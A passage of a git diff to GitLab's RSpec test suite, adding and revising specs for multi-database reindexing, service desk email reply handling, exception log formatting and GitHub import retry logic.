Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] + + Gitlab::Database::SharedModel.using_connection(model.connection) do + example.run + end + end + before do swapout_view_for_table(:postgres_indexes) diff --git a/spec/lib/gitlab/database/reindexing_spec.rb b/spec/lib/gitlab/database/reindexing_spec.rb index 13aff343432..0c576505e07 100644 --- a/spec/lib/gitlab/database/reindexing_spec.rb +++ b/spec/lib/gitlab/database/reindexing_spec.rb @@ -6,6 +6,63 @@ RSpec.describe Gitlab::Database::Reindexing do include ExclusiveLeaseHelpers include Database::DatabaseHelpers + describe '.invoke' do + let(:databases) { Gitlab::Database.database_base_models } + let(:databases_count) { databases.count } + + it 'cleans up any leftover indexes' do + expect(described_class).to 
receive(:cleanup_leftovers!).exactly(databases_count).times + + described_class.invoke + end + + context 'when there is an error raised' do + it 'logs and re-raise' do + expect(described_class).to receive(:automatic_reindexing).and_raise('Unexpected!') + expect(Gitlab::AppLogger).to receive(:error) + + expect { described_class.invoke }.to raise_error('Unexpected!') + end + end + + context 'when async index creation is enabled' do + it 'executes async index creation prior to any reindexing actions' do + stub_feature_flags(database_async_index_creation: true) + + expect(Gitlab::Database::AsyncIndexes).to receive(:create_pending_indexes!).ordered.exactly(databases_count).times + expect(described_class).to receive(:automatic_reindexing).ordered.exactly(databases_count).times + + described_class.invoke + end + end + + context 'when async index creation is disabled' do + it 'does not execute async index creation' do + stub_feature_flags(database_async_index_creation: false) + + expect(Gitlab::Database::AsyncIndexes).not_to receive(:create_pending_indexes!) + + described_class.invoke + end + end + + context 'calls automatic reindexing' do + it 'uses all candidate indexes' do + expect(described_class).to receive(:automatic_reindexing).exactly(databases_count).times + + described_class.invoke + end + + context 'when explicit database is given' do + it 'skips other databases' do + expect(described_class).to receive(:automatic_reindexing).once + + described_class.invoke(Gitlab::Database::PRIMARY_DATABASE_NAME) + end + end + end + end + describe '.automatic_reindexing' do subject { described_class.automatic_reindexing(maximum_records: limit) } @@ -133,10 +190,19 @@ RSpec.describe Gitlab::Database::Reindexing do end describe '.cleanup_leftovers!' do - subject { described_class.cleanup_leftovers! } + subject(:cleanup_leftovers) { described_class.cleanup_leftovers! 
} + + let(:model) { Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] } + let(:connection) { model.connection } + + around do |example| + Gitlab::Database::SharedModel.using_connection(connection) do + example.run + end + end before do - ApplicationRecord.connection.execute(<<~SQL) + connection.execute(<<~SQL) CREATE INDEX foobar_ccnew ON users (id); CREATE INDEX foobar_ccnew1 ON users (id); SQL @@ -150,11 +216,11 @@ RSpec.describe Gitlab::Database::Reindexing do expect_query("DROP INDEX CONCURRENTLY IF EXISTS \"public\".\"foobar_ccnew1\"") expect_query("RESET idle_in_transaction_session_timeout; RESET lock_timeout") - subject + cleanup_leftovers end def expect_query(sql) - expect(ApplicationRecord.connection).to receive(:execute).ordered.with(sql).and_wrap_original do |method, sql| + expect(connection).to receive(:execute).ordered.with(sql).and_wrap_original do |method, sql| method.call(sql.sub(/CONCURRENTLY/, '')) end end diff --git a/spec/lib/gitlab/database/shared_model_spec.rb b/spec/lib/gitlab/database/shared_model_spec.rb index 94f2b5a3434..54af4a0c4dc 100644 --- a/spec/lib/gitlab/database/shared_model_spec.rb +++ b/spec/lib/gitlab/database/shared_model_spec.rb @@ -84,4 +84,16 @@ RSpec.describe Gitlab::Database::SharedModel do expect(described_class.connection).to be(original_connection) end end + + describe '#connection_db_config' do + it 'returns the class connection_db_config' do + shared_model_class = Class.new(described_class) do + self.table_name = 'postgres_async_indexes' + end + + shared_model = shared_model_class.new + + expect(shared_model.connection_db_config). 
to eq(described_class.connection_db_config) + end + end end diff --git a/spec/lib/gitlab/database/type/json_pg_safe_spec.rb b/spec/lib/gitlab/database/type/json_pg_safe_spec.rb new file mode 100644 index 00000000000..91dc6f39aa7 --- /dev/null +++ b/spec/lib/gitlab/database/type/json_pg_safe_spec.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Database::Type::JsonPgSafe do + let(:type) { described_class.new } + + describe '#serialize' do + using RSpec::Parameterized::TableSyntax + + subject { type.serialize(value) } + + where(:value, :json) do + nil | nil + 1 | '1' + 1.0 | '1.0' + "str\0ing\u0000" | '"string"' + ["\0arr", "a\u0000y"] | '["arr","ay"]' + { "key\0" => "value\u0000\0" } | '{"key":"value"}' + end + + with_them do + it { is_expected.to eq(json) } + end + end +end diff --git a/spec/lib/gitlab/diff/custom_diff_spec.rb b/spec/lib/gitlab/diff/custom_diff_spec.rb new file mode 100644 index 00000000000..246508d2e1e --- /dev/null +++ b/spec/lib/gitlab/diff/custom_diff_spec.rb @@ -0,0 +1,62 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Diff::CustomDiff do + include RepoHelpers + + let(:project) { create(:project, :repository) } + let(:repository) { project.repository } + let(:ipynb_blob) { repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') } + let(:blob) { repository.blob_at('HEAD', 'files/ruby/regex.rb') } + + describe '#preprocess_before_diff' do + context 'for ipynb files' do + it 'transforms the diff' do + expect(described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob)).not_to include('cells') + end + + it 'adds the blob to the list of transformed blobs' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_for_diff?(ipynb_blob)).to be_truthy + end + end + + context 'for other files' do + it 'returns nil' do + expect(described_class.preprocess_before_diff(blob.path, nil, 
blob)).to be_nil + end + + it 'does not add the blob to the list of transformed blobs' do + described_class.preprocess_before_diff(blob.path, nil, blob) + + expect(described_class.transformed_for_diff?(blob)).to be_falsey + end + end + end + + describe '#transformed_blob_data' do + it 'transforms blob data if file was processed' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_blob_data(ipynb_blob)).not_to include('cells') + end + + it 'does not transform blob data if file was not processed' do + expect(described_class.transformed_blob_data(ipynb_blob)).to be_nil + end + end + + describe '#transformed_blob_language' do + it 'is md when file was preprocessed' do + described_class.preprocess_before_diff(ipynb_blob.path, nil, ipynb_blob) + + expect(described_class.transformed_blob_language(ipynb_blob)).to eq('md') + end + + it 'is nil for a .ipynb blob that was not preprocessed' do + expect(described_class.transformed_blob_language(ipynb_blob)).to be_nil + end + end +end diff --git a/spec/lib/gitlab/diff/file_spec.rb b/spec/lib/gitlab/diff/file_spec.rb index 4b437397688..45a49a36fe2 100644 --- a/spec/lib/gitlab/diff/file_spec.rb +++ b/spec/lib/gitlab/diff/file_spec.rb @@ -53,7 +53,7 @@ RSpec.describe Gitlab::Diff::File do describe 'initialize' do context 'when file is ipynb with a change after transformation' do - let(:commit) { project.commit("f6b7a707") } + let(:commit) { project.commit("532c837") } let(:diff) { commit.raw_diffs.first } let(:diff_file) { described_class.new(diff, diff_refs: commit.diff_refs, repository: project.repository) } @@ -63,7 +63,7 @@ RSpec.describe Gitlab::Diff::File do end it 'recreates the diff by transforming the files' do - expect(diff_file.diff.diff).not_to include('"| Fake') + expect(diff_file.diff.diff).not_to include('cell_type') end end @@ -73,7 +73,7 @@ RSpec.describe Gitlab::Diff::File do end it 'does not recreate the diff' do - expect(diff_file.diff.diff).to 
include('"| Fake') + expect(diff_file.diff.diff).to include('cell_type') end end end diff --git a/spec/lib/gitlab/diff/highlight_spec.rb b/spec/lib/gitlab/diff/highlight_spec.rb index 94b28c38fa2..624160d2f48 100644 --- a/spec/lib/gitlab/diff/highlight_spec.rb +++ b/spec/lib/gitlab/diff/highlight_spec.rb @@ -151,20 +151,6 @@ RSpec.describe Gitlab::Diff::Highlight do expect(subject[2].rich_text).to eq(%Q{ <span id="LC7" class="line" lang=""> def popen(cmd, path=nil)</span>\n}) expect(subject[2].rich_text).to be_html_safe end - - context 'when limited_diff_highlighting is disabled' do - before do - stub_feature_flags(limited_diff_highlighting: false) - stub_feature_flags(diff_line_syntax_highlighting: false) - end - - it 'blobs are highlighted as plain text with loading all data' do - expect(diff_file.blob).to receive(:load_all_data!).twice - - code = %Q{ <span id="LC7" class="line" lang=""> def popen(cmd, path=nil)</span>\n} - expect(subject[2].rich_text).to eq(code) - end - end end end end diff --git a/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb b/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb index bd4f1d164a8..10098a66ae9 100644 --- a/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb +++ b/spec/lib/gitlab/email/handler/create_issue_handler_spec.rb @@ -101,6 +101,17 @@ RSpec.describe Gitlab::Email::Handler::CreateIssueHandler do end end + context 'when all lines of email are quotes' do + let(:email_raw) { email_fixture('emails/valid_new_issue_with_only_quotes.eml') } + + it 'creates email with correct body' do + receiver.execute + + issue = Issue.last + expect(issue.description).to include('This email has been forwarded without new content.') + end + end + context "something is wrong" do context "when the issue could not be saved" do before do diff --git a/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb b/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb index c579027788d..7c34fb1a926 100644 --- 
a/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb +++ b/spec/lib/gitlab/email/handler/service_desk_handler_spec.rb @@ -12,6 +12,8 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do let(:email_raw) { email_fixture('emails/service_desk.eml') } let(:author_email) { 'jake@adventuretime.ooo' } + let(:message_id) { 'CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com' } + let_it_be(:group) { create(:group, :private, name: "email") } let(:expected_description) do @@ -40,6 +42,7 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do expect(new_issue.all_references.all).to be_empty expect(new_issue.title).to eq("The message subject! @all") expect(new_issue.description).to eq(expected_description.strip) + expect(new_issue.email&.email_message_id).to eq(message_id) end it 'creates an issue_email_participant' do @@ -72,6 +75,95 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do it_behaves_like 'a new issue request' end + context 'when replying to issue creation email' do + def receive_reply + reply_email_raw = email_fixture('emails/service_desk_reply.eml') + + second_receiver = Gitlab::Email::Receiver.new(reply_email_raw) + second_receiver.execute + end + + context 'when an issue with message_id has been found' do + before do + receiver.execute + end + + subject do + receive_reply + end + + it 'does not create an additional issue' do + expect { subject }.not_to change { Issue.count } + end + + it 'adds a comment to the created issue' do + subject + + notes = Issue.last.notes + new_note = notes.first + + expect(notes.count).to eq(1) + expect(new_note.note).to eq("Service desk reply!\n\n`/label ~label2`") + expect(new_note.author).to eql(User.support_bot) + end + + it 'does not send thank you email' do + expect(Notify).not_to receive(:service_desk_thank_you_email) + + subject + end + + context 'when issue_email_participants FF is enabled' do + it 'creates 2 issue_email_participants' do + subject + + 
expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(alan@adventuretime.ooo jake@adventuretime.ooo)) + end + end + + context 'when issue_email_participants FF is disabled' do + before do + stub_feature_flags(issue_email_participants: false) + end + + it 'creates only 1 issue_email_participant' do + subject + + expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(jake@adventuretime.ooo)) + end + end + end + + context 'when an issue with message_id has not been found' do + subject do + receive_reply + end + + it 'creates a new issue correctly' do + expect { subject }.to change { Issue.count }.by(1) + + issue = Issue.last + + expect(issue.description).to eq("Service desk reply!\n\n`/label ~label2`") + end + + it 'sends thank you email once' do + expect(Notify).to receive(:service_desk_thank_you_email).once.and_return(double(deliver_later: true)) + + subject + end + + it 'creates 1 issue_email_participant' do + subject + + expect(Issue.last.issue_email_participants.map(&:email)) + .to match_array(%w(alan@adventuretime.ooo)) + end + end + end + context 'when using issue templates' do let_it_be(:user) { create(:user) } @@ -270,6 +362,20 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do end end + context 'when issue email creation fails' do + before do + allow(::Issue::Email).to receive(:create!).and_raise(StandardError) + end + + it 'still creates a new issue' do + expect { receiver.execute }.to change { Issue.count }.by(1) + end + + it 'does not create issue email record' do + expect { receiver.execute }.not_to change { Issue::Email.count } + end + end + context 'when rate limiting is in effect', :freeze_time, :clean_gitlab_redis_rate_limiting do let(:receiver) { Gitlab::Email::Receiver.new(email_raw) } @@ -291,19 +397,19 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do rescue RateLimitedService::RateLimitedError end.to change { Issue.count }.by(1) end + end - context 'when requests are sent 
by different users' do - let(:email_raw_2) { email_fixture('emails/service_desk_forwarded.eml') } - let(:receiver2) { Gitlab::Email::Receiver.new(email_raw_2) } + context 'when requests are sent by different users' do + let(:email_raw_2) { email_fixture('emails/service_desk_forwarded.eml') } + let(:receiver2) { Gitlab::Email::Receiver.new(email_raw_2) } - subject do - receiver.execute - receiver2.execute - end + subject do + receiver.execute + receiver2.execute + end - it 'creates 2 issues' do - expect { subject }.to change { Issue.count }.by(2) - end + it 'creates 2 issues' do + expect { subject }.to change { Issue.count }.by(2) end end @@ -389,6 +495,7 @@ RSpec.describe Gitlab::Email::Handler::ServiceDeskHandler do context 'when the email is forwarded through an alias' do let(:author_email) { 'jake.g@adventuretime.ooo' } let(:email_raw) { email_fixture('emails/service_desk_forwarded.eml') } + let(:message_id) { 'CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=fdskbsf@mail.gmail.com' } it_behaves_like 'a new issue request' end diff --git a/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb b/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb index 352eb596cd9..7dd4ee7e25d 100644 --- a/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb +++ b/spec/lib/gitlab/email/hook/smime_signature_interceptor_spec.rb @@ -50,6 +50,7 @@ RSpec.describe Gitlab::Email::Hook::SmimeSignatureInterceptor do expect(mail.header['To'].value).to eq('test@example.com') expect(mail.header['From'].value).to eq('info@example.com') expect(mail.header['Content-Type'].value).to match('multipart/signed').and match('protocol="application/x-pkcs7-signature"') + expect(mail.header.include?('Content-Disposition')).to eq(false) # verify signature and obtain pkcs7 encoded content p7enc = Gitlab::Email::Smime::Signer.verify_signature( diff --git a/spec/lib/gitlab/email/service_desk_receiver_spec.rb b/spec/lib/gitlab/email/service_desk_receiver_spec.rb index 
6ba58ad5e93..49cbec6fffc 100644 --- a/spec/lib/gitlab/email/service_desk_receiver_spec.rb +++ b/spec/lib/gitlab/email/service_desk_receiver_spec.rb @@ -9,9 +9,7 @@ RSpec.describe Gitlab::Email::ServiceDeskReceiver do context 'when the email contains a valid email address' do before do stub_service_desk_email_setting(enabled: true, address: 'support+%{key}@example.com') - end - it 'finds the service desk key' do handler = double(execute: true, metrics_event: true, metrics_params: true) expected_params = [ an_instance_of(Mail::Message), nil, @@ -20,8 +18,38 @@ RSpec.describe Gitlab::Email::ServiceDeskReceiver do expect(Gitlab::Email::Handler::ServiceDeskHandler) .to receive(:new).with(*expected_params).and_return(handler) + end + + context 'when in a To header' do + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when the email contains a valid email address in a header' do + context 'when in a Delivered-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_reply.eml') } + + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when in a Envelope-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_envelope_to.eml') } + + it 'finds the service desk key' do + receiver.execute + end + end + + context 'when in a X-Envelope-To header' do + let(:email) { fixture_file('emails/service_desk_custom_address_x_envelope_to.eml') } - receiver.execute + it 'finds the service desk key' do + receiver.execute + end + end end end diff --git a/spec/lib/gitlab/empty_search_results_spec.rb b/spec/lib/gitlab/empty_search_results_spec.rb new file mode 100644 index 00000000000..e79586bef68 --- /dev/null +++ b/spec/lib/gitlab/empty_search_results_spec.rb @@ -0,0 +1,31 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::EmptySearchResults do + subject { described_class.new } + + describe '#objects' do + it 'returns an empty array' do + 
expect(subject.objects).to match_array([]) + end + end + + describe '#formatted_count' do + it 'returns a zero' do + expect(subject.formatted_count).to eq('0') + end + end + + describe '#highlight_map' do + it 'returns an empty hash' do + expect(subject.highlight_map).to eq({}) + end + end + + describe '#aggregations' do + it 'returns an empty array' do + expect(subject.aggregations).to match_array([]) + end + end +end diff --git a/spec/lib/gitlab/error_tracking_spec.rb b/spec/lib/gitlab/error_tracking_spec.rb index 7ad1f52780a..a5d44963f4b 100644 --- a/spec/lib/gitlab/error_tracking_spec.rb +++ b/spec/lib/gitlab/error_tracking_spec.rb @@ -205,16 +205,6 @@ RSpec.describe Gitlab::ErrorTracking do expect(sentry_event.dig('extra', 'sql')).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') end end - - context 'when the `ActiveRecord::StatementInvalid` is wrapped in another exception' do - it 'injects the normalized sql query into extra' do - allow(exception).to receive(:cause).and_return(ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1')) - - track_exception - - expect(sentry_event.dig('extra', 'sql')).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') - end - end end context 'event processors' do diff --git a/spec/lib/gitlab/etag_caching/store_spec.rb b/spec/lib/gitlab/etag_caching/store_spec.rb index 46195e64715..6188a3fc8b3 100644 --- a/spec/lib/gitlab/etag_caching/store_spec.rb +++ b/spec/lib/gitlab/etag_caching/store_spec.rb @@ -80,5 +80,19 @@ RSpec.describe Gitlab::EtagCaching::Store, :clean_gitlab_redis_shared_state do expect(store.get(key)).to eq(etag) end end + + context 'with multiple keys' do + let(:keys) { ['/my-group/my-project/builds/234.json', '/api/graphql:pipelines/id/5'] } + + it 'stores and returns multiple values' do + etags = store.touch(*keys) + + expect(etags.size).to eq(keys.size) + + keys.each_with_index do |key,
i| + expect(store.get(key)).to eq(etags[i]) + end + end + end end end diff --git a/spec/lib/gitlab/exception_log_formatter_spec.rb b/spec/lib/gitlab/exception_log_formatter_spec.rb new file mode 100644 index 00000000000..beeeeb2b64c --- /dev/null +++ b/spec/lib/gitlab/exception_log_formatter_spec.rb @@ -0,0 +1,57 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::ExceptionLogFormatter do + describe '.format!' do + let(:exception) { RuntimeError.new('bad request') } + let(:backtrace) { caller } + + let(:payload) { {} } + + before do + allow(exception).to receive(:backtrace).and_return(backtrace) + end + + it 'adds exception data to log' do + described_class.format!(exception, payload) + + expect(payload['exception.class']).to eq('RuntimeError') + expect(payload['exception.message']).to eq('bad request') + expect(payload['exception.backtrace']).to eq(Gitlab::BacktraceCleaner.clean_backtrace(backtrace)) + expect(payload['exception.sql']).to be_nil + end + + context 'when exception is ActiveRecord::StatementInvalid' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1') } + + it 'adds the normalized SQL query to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end + + context 'when the ActiveRecord::StatementInvalid is wrapped in another exception' do + before do + allow(exception).to receive(:cause).and_return(ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1')) + end + + it 'adds the normalized SQL query to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end + + context 'when the 
ActiveRecord::StatementInvalid is a bad query' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT SELECT FROM SELECT') } + + it 'adds the query as-is to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT SELECT FROM SELECT') + end + end + end +end diff --git a/spec/lib/gitlab/experimentation/controller_concern_spec.rb b/spec/lib/gitlab/experimentation/controller_concern_spec.rb index 1f7b7b90467..8a96771eeb8 100644 --- a/spec/lib/gitlab/experimentation/controller_concern_spec.rb +++ b/spec/lib/gitlab/experimentation/controller_concern_spec.rb @@ -97,7 +97,7 @@ RSpec.describe Gitlab::Experimentation::ControllerConcern, type: :controller do describe '#push_frontend_experiment' do it 'pushes an experiment to the frontend' do - gon = instance_double('gon') + gon = class_double('Gon') stub_experiment_for_subject(my_experiment: true) allow(controller).to receive(:gon).and_return(gon) diff --git a/spec/lib/gitlab/experimentation/experiment_spec.rb b/spec/lib/gitlab/experimentation/experiment_spec.rb index d52ab3a8983..d9bf85460b3 100644 --- a/spec/lib/gitlab/experimentation/experiment_spec.rb +++ b/spec/lib/gitlab/experimentation/experiment_spec.rb @@ -16,6 +16,7 @@ RSpec.describe Gitlab::Experimentation::Experiment do before do skip_feature_flags_yaml_validation skip_default_enabled_yaml_check + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) feature = double('FeatureFlag', percentage_of_time_value: percentage, enabled?: true) allow(Feature).to receive(:get).with(:experiment_key_experiment_percentage).and_return(feature) end diff --git a/spec/lib/gitlab/git/diff_stats_collection_spec.rb b/spec/lib/gitlab/git/diff_stats_collection_spec.rb index f2fe03829be..0876a88a2ee 100644 --- a/spec/lib/gitlab/git/diff_stats_collection_spec.rb +++ b/spec/lib/gitlab/git/diff_stats_collection_spec.rb @@ -36,7 +36,7 @@ RSpec.describe Gitlab::Git::DiffStatsCollection do end it 'returns 
capped number when it is bigger than max_files' do - allow(::Commit).to receive(:max_diff_options).and_return(max_files: 1) + allow(::Commit).to receive(:diff_max_files).and_return(1) expect(collection.real_size).to eq('1+') end diff --git a/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb b/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb index 16cea1dc1a3..b2603e099e6 100644 --- a/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb +++ b/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb @@ -110,7 +110,7 @@ RSpec.describe Gitlab::Git::RuggedImpl::UseRugged, :seed_helper do describe '#running_puma_with_multiple_threads?' do context 'when using Puma' do before do - stub_const('::Puma', class_double('Puma')) + stub_const('::Puma', double('puma constant')) allow(Gitlab::Runtime).to receive(:puma?).and_return(true) end diff --git a/spec/lib/gitlab/git/tree_spec.rb b/spec/lib/gitlab/git/tree_spec.rb index 005f8ecaa3a..97ba177da71 100644 --- a/spec/lib/gitlab/git/tree_spec.rb +++ b/spec/lib/gitlab/git/tree_spec.rb @@ -43,7 +43,7 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#dir?' do - let(:dir) { entries.select(&:dir?).first } + let(:dir) { entries.find(&:dir?) } it { expect(dir).to be_kind_of Gitlab::Git::Tree } it { expect(dir.id).to eq('3c122d2b7830eca25235131070602575cf8b41a1') } @@ -134,7 +134,7 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#file?' do - let(:file) { entries.select(&:file?).first } + let(:file) { entries.find(&:file?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.id).to eq('dfaa3f97ca337e20154a98ac9d0be76ddd1fcc82') } @@ -143,21 +143,21 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#readme?' do - let(:file) { entries.select(&:readme?).first } + let(:file) { entries.find(&:readme?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.name).to eq('README.md') } end describe '#contributing?' 
do - let(:file) { entries.select(&:contributing?).first } + let(:file) { entries.find(&:contributing?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.name).to eq('CONTRIBUTING.md') } end describe '#submodule?' do - let(:submodule) { entries.select(&:submodule?).first } + let(:submodule) { entries.find(&:submodule?) } it { expect(submodule).to be_kind_of Gitlab::Git::Tree } it { expect(submodule.id).to eq('79bceae69cb5750d6567b223597999bfa91cb3b9') } diff --git a/spec/lib/gitlab/gitaly_client/commit_service_spec.rb b/spec/lib/gitlab/gitaly_client/commit_service_spec.rb index d8e397dd6f3..8d9ab5db886 100644 --- a/spec/lib/gitlab/gitaly_client/commit_service_spec.rb +++ b/spec/lib/gitlab/gitaly_client/commit_service_spec.rb @@ -13,10 +13,6 @@ RSpec.describe Gitlab::GitalyClient::CommitService do let(:client) { described_class.new(repository) } describe '#diff_from_parent' do - before do - stub_feature_flags(increased_diff_limits: false) - end - context 'when a commit has a parent' do it 'sends an RPC request with the parent ID as left commit' do request = Gitaly::CommitDiffRequest.new( @@ -108,45 +104,6 @@ RSpec.describe Gitlab::GitalyClient::CommitService do end end - describe '#between' do - let(:from) { 'master' } - let(:to) { Gitlab::Git::EMPTY_TREE_ID } - - context 'with between_commits_via_list_commits enabled' do - before do - stub_feature_flags(between_commits_via_list_commits: true) - end - - it 'sends an RPC request' do - request = Gitaly::ListCommitsRequest.new( - repository: repository_message, revisions: ["^" + from, to], reverse: true - ) - - expect_any_instance_of(Gitaly::CommitService::Stub).to receive(:list_commits) - .with(request, kind_of(Hash)).and_return([]) - - described_class.new(repository).between(from, to) - end - end - - context 'with between_commits_via_list_commits disabled' do - before do - stub_feature_flags(between_commits_via_list_commits: false) - end - - it 'sends an RPC request' do - request = 
Gitaly::CommitsBetweenRequest.new( - repository: repository_message, from: from, to: to - ) - - expect_any_instance_of(Gitaly::CommitService::Stub).to receive(:commits_between) - .with(request, kind_of(Hash)).and_return([]) - - described_class.new(repository).between(from, to) - end - end - end - describe '#diff_stats' do let(:left_commit_id) { 'master' } let(:right_commit_id) { 'cfe32cf61b73a0d5e9f13e774abde7ff789b1660' } diff --git a/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb b/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb index 0eecdfcb630..d0787d8b673 100644 --- a/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb +++ b/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb @@ -43,10 +43,10 @@ RSpec.describe Gitlab::GitalyClient::ConflictFilesStitcher do messages = [ double(files: [double(header: header_1), double(header: nil, content: content_1[0..5])]), - double(files: [double(header: nil, content: content_1[6..-1])]), + double(files: [double(header: nil, content: content_1[6..])]), double(files: [double(header: header_2)]), double(files: [double(header: nil, content: content_2[0..5]), double(header: nil, content: content_2[6..10])]), - double(files: [double(header: nil, content: content_2[11..-1])]) + double(files: [double(header: nil, content: content_2[11..])]) ] conflict_files = described_class.new(messages, target_repository.gitaly_repository).to_a diff --git a/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb b/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb index 113c47b4f2c..54c84ddc56f 100644 --- a/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb +++ b/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb @@ -41,7 +41,7 @@ RSpec.describe Gitlab::GitalyClient::DiffStitcher do msg_2.raw_patch_data = diff_2.patch[0..100] msg_2.end_of_patch = false - msg_3 = OpenStruct.new(raw_patch_data: diff_2.patch[101..-1], end_of_patch: true) + msg_3 = OpenStruct.new(raw_patch_data: diff_2.patch[101..], 
end_of_patch: true) msg_4 = OpenStruct.new(diff_3.to_h.except(:patch)) msg_4.raw_patch_data = diff_3.patch diff --git a/spec/lib/gitlab/github_import/client_spec.rb b/spec/lib/gitlab/github_import/client_spec.rb index 194dfb228ee..c4d05e92633 100644 --- a/spec/lib/gitlab/github_import/client_spec.rb +++ b/spec/lib/gitlab/github_import/client_spec.rb @@ -221,6 +221,50 @@ RSpec.describe Gitlab::GithubImport::Client do expect(client.with_rate_limit { 10 }).to eq(10) end + + context 'when Faraday error received from octokit', :aggregate_failures do + let(:error_class) { described_class::CLIENT_CONNECTION_ERROR } + let(:info_params) { { 'error.class': error_class } } + let(:block_to_rate_limit) { -> { client.pull_request('foo/bar', 999) } } + + context 'when rate_limiting_enabled is true' do + it 'retries on error and succeeds' do + allow_retry + + expect(client).to receive(:requests_remaining?).twice.and_return(true) + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.with_rate_limit(&block_to_rate_limit)).to be(true) + end + + it 'retries and does not succeed' do + allow(client).to receive(:requests_remaining?).and_return(true) + allow(client.octokit).to receive(:pull_request).and_raise(error_class, 'execution expired') + + expect { client.with_rate_limit(&block_to_rate_limit) }.to raise_error(error_class, 'execution expired') + end + end + + context 'when rate_limiting_enabled is false' do + before do + allow(client).to receive(:rate_limiting_enabled?).and_return(false) + end + + it 'retries on error and succeeds' do + allow_retry + + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.with_rate_limit(&block_to_rate_limit)).to be(true) + end + + it 'retries and does not succeed' do + allow(client.octokit).to receive(:pull_request).and_raise(error_class, 'execution expired') + + expect { client.with_rate_limit(&block_to_rate_limit) }.to 
raise_error(error_class, 'execution expired') + end + end + end end describe '#requests_remaining?' do @@ -505,6 +549,25 @@ RSpec.describe Gitlab::GithubImport::Client do client.search_repos_by_name('test') end + + context 'when Faraday error received from octokit', :aggregate_failures do + let(:error_class) { described_class::CLIENT_CONNECTION_ERROR } + let(:info_params) { { 'error.class': error_class } } + + it 'retries on error and succeeds' do + allow_retry(:search_repositories) + + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.search_repos_by_name('test')).to be(true) + end + + it 'retries and does not succeed' do + allow(client.octokit).to receive(:search_repositories).and_raise(error_class, 'execution expired') + + expect { client.search_repos_by_name('test') }.to raise_error(error_class, 'execution expired') + end + end end describe '#search_query' do @@ -531,4 +594,12 @@ RSpec.describe Gitlab::GithubImport::Client do end end end + + def allow_retry(method = :pull_request) + call_count = 0 + allow(client.octokit).to receive(method) do + call_count += 1 + call_count > 1 ? 